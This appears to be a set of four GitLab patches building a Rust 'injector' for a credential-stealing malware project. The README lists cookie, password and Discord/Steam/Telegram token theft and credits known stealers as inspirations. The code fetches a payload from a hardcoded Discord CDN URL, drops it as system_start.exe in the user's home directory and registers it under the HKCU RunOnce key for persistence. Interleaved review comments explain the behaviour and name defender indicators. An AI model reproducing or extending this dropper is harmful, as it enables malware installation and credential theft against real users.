From 907babc3d48754d98db0786a76e859bb71ba4acb Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Mon, 15 May 2023 13:26:30 +0200
Subject: [PATCH 1/4] Inspirations

---
 README.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/README.md b/README.md
index 0a49126..208f5e6 100644
--- a/README.md
+++ b/README.md
@@ -26,3 +26,9 @@ Additional:
 - anti-VM, anti-debug
 - packing
 - obfuscation
+
+## Inspirations
+
+https://github.com/Abdulrhmanbk/discoon-malware/
+
+https://github.com/doenerium69/doenerium
-- 
GitLab


From 2bb928d95d3015ba87248b9d29c7e3174261f993 Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Wed, 17 May 2023 14:31:26 +0200
Subject: [PATCH 2/4] Injector can download to home dir

---
 injector/Cargo.toml  |  1 +
 injector/src/main.rs | 23 ++++++++++++++++++-----
 2 files changed, 19 insertions(+), 5 deletions(-)

diff --git a/injector/Cargo.toml b/injector/Cargo.toml
index 8e92751..a06d1e5 100644
--- a/injector/Cargo.toml
+++ b/injector/Cargo.toml
@@ -8,3 +8,4 @@ edition = "2021"
 [dependencies]
 reqwest = "*"
 tokio = { version = "1", features = ["full"] }
+directories = "5.0.1"
diff --git a/injector/src/main.rs b/injector/src/main.rs
index 63a2560..af69aed 100644
--- a/injector/src/main.rs
+++ b/injector/src/main.rs
@@ -1,4 +1,5 @@
 use std::{io::Cursor, env::var_os};
+use directories::UserDirs;
 type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>;
  
 async fn fetch_url(url: String, file_name: String) -> Result<()> {
@@ -11,9 +12,21 @@ async fn fetch_url(url: String, file_name: String) -> Result<()> {
  
 #[tokio::main]
 async fn main() {
-    let test = var_os("APPDATA").unwrap();
-    let appdata = test.to_str().unwrap();
-    let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe";
-    let startup = format!("{}{}", appdata, right_path);
-    fetch_url("URL HERE".to_string(), startup.to_string()).await.unwrap();
+
+    if true {
+        let user_dirs = UserDirs::new().unwrap() ;
+        let homedir = user_dirs.home_dir().to_str().unwrap();
+        let path = format!("{}{}", homedir, "\\system_start.exe");
+
+        fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap();
+
+    }else{
+        let test = var_os("APPDATA").unwrap();
+        let appdata = test.to_str().unwrap();
+        let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe";
+        let path = format!("{}{}", appdata, right_path);
+
+        fetch_url("URL HERE".to_string(), path.to_string()).await.unwrap();
+
+    }
 }
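Review bot: The `if true {` guard makes the `else` arm (the `APPDATA`/Startup-folder variant) unreachable, so the only behaviour this commit actually ships is: resolve the home directory via `UserDirs`, fetch the hardcoded `cdn.discordapp.com` attachment, and write it as `system_start.exe` directly under the user's home directory. A comment such as `// Only the home-directory branch is live; the APPDATA/Startup branch below is dead code` would make that explicit to anyone reading this source. From a defender's view the signals are in these lines rather than in any check: a download by an HTTP client declared as `reqwest = "*"` in the accompanying Cargo.toml, a dropped `.exe` in the home directory, and a literal `\\` separator that ties the code to Windows hosts. Every failure point (`UserDirs::new()`, `to_str()`, `fetch_url`) is an `unwrap()`, so a missing home directory, a non-UTF-8 path, or a failed download ends the process with a panic instead of a reported error.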
-- 
GitLab


From a76eb38f72c29f4d4f290044f8d1d456ad7744cd Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Thu, 18 May 2023 22:09:39 +0200
Subject: [PATCH 3/4] Injector adds payload path to registry

---
 injector/Cargo.toml  |  1 +
 injector/src/main.rs | 11 +++++++++++
 2 files changed, 12 insertions(+)

diff --git a/injector/Cargo.toml b/injector/Cargo.toml
index a06d1e5..0f246f9 100644
--- a/injector/Cargo.toml
+++ b/injector/Cargo.toml
@@ -9,3 +9,4 @@ edition = "2021"
 reqwest = "*"
 tokio = { version = "1", features = ["full"] }
 directories = "5.0.1"
+winreg = "0.50.0"
diff --git a/injector/src/main.rs b/injector/src/main.rs
index af69aed..1e446d4 100644
--- a/injector/src/main.rs
+++ b/injector/src/main.rs
@@ -1,5 +1,8 @@
 use std::{io::Cursor, env::var_os};
 use directories::UserDirs;
+use std::path::Path;
+use winreg::enums::*;
+use winreg::RegKey;
 type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>;
  
 async fn fetch_url(url: String, file_name: String) -> Result<()> {
@@ -20,6 +23,14 @@ async fn main() {
 
         fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap();
 
+        let hkcu = RegKey::predef(HKEY_CURRENT_USER);
+        let reg_path = Path::new("Software")   
+            .join("Microsoft")
+            .join("Windows")
+            .join("CurrentVersion")
+            .join("RunOnce");
+        let (key, _) = hkcu.create_subkey(&reg_path).unwrap();
+        key.set_value("System start", &path).unwrap();
     }else{
         let test = var_os("APPDATA").unwrap();
         let appdata = test.to_str().unwrap();
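Review bot: The lines added after the download register the dropped file's path under `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce` as value `System start`, an autostart location Windows executes at that user's next logon and then clears, so this commit turns the downloader into a per-user autostart mechanism. Both `create_subkey` and `set_value` are `unwrap()`ed, so an access-denied or policy-blocked registry write aborts the process rather than being handled. Writes to Run/RunOnce values are a well-known indicator: registry-value-set telemetry (Sysmon Event ID 13), autoruns inventories and application-control rules on the unsigned `system_start.exe` in the home directory are the controls that surface or block exactly this key and value name. The enclosing `main` function starts and ends outside the hunk.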
-- 
GitLab


From adf3926b28bac3d4c2391af70dbcebd72fcde2fd Mon Sep 17 00:00:00 2001
From: User <user@debian-BULLSEYE-live-builder-AMD64>
Date: Thu, 18 May 2023 22:18:46 +0200
Subject: [PATCH 4/4] Payload url in injector's download function

---
 README.md            | 2 +-
 injector/src/main.rs | 7 ++++---
 2 files changed, 5 insertions(+), 4 deletions(-)

diff --git a/README.md b/README.md
index 208f5e6..4e094ba 100644
--- a/README.md
+++ b/README.md
@@ -22,7 +22,7 @@ Additional:
 - browser cookies
 - browser passwords
 - telegram, steam, discord tokens
-- persistence via regkey
+- persistence via regkey ✅
 - anti-VM, anti-debug
 - packing
 - obfuscation
diff --git a/injector/src/main.rs b/injector/src/main.rs
index 1e446d4..90756cc 100644
--- a/injector/src/main.rs
+++ b/injector/src/main.rs
@@ -5,7 +5,8 @@ use winreg::enums::*;
 use winreg::RegKey;
 type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>;
  
-async fn fetch_url(url: String, file_name: String) -> Result<()> {
+async fn download_payload(file_name: String) -> Result<()> {
+    let url = "https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string();
     let response = reqwest::get(url).await?;
     let mut file = std::fs::File::create(file_name)?;
     let mut content =  Cursor::new(response.bytes().await?);
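Review bot: `download_payload` now carries the `cdn.discordapp.com` URL as a literal instead of a parameter, so the payload location is a fixed string in the compiled binary and the branch in `main` that previously passed the `URL HERE` placeholder (third hunk of this file) now silently fetches the same payload. For a defender this single hardcoded HTTPS endpoint is the network indicator to alert on, and the unchanged `std::fs::File::create` write of the response bytes is the file drop to watch for. The body of `download_payload` continues past the hunk, and the `Result` it returns is still `unwrap()`ed at both call sites.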
@@ -21,7 +22,7 @@ async fn main() {
         let homedir = user_dirs.home_dir().to_str().unwrap();
         let path = format!("{}{}", homedir, "\\system_start.exe");
 
-        fetch_url("https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(), path.to_string()).await.unwrap();
+        download_payload(path.to_string()).await.unwrap();
 
         let hkcu = RegKey::predef(HKEY_CURRENT_USER);
         let reg_path = Path::new("Software")   
@@ -37,7 +38,7 @@ async fn main() {
         let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe";
         let path = format!("{}{}", appdata, right_path);
 
-        fetch_url("URL HERE".to_string(), path.to_string()).await.unwrap();
+        download_payload(path.to_string()).await.unwrap();
 
     }
 }
-- 
GitLab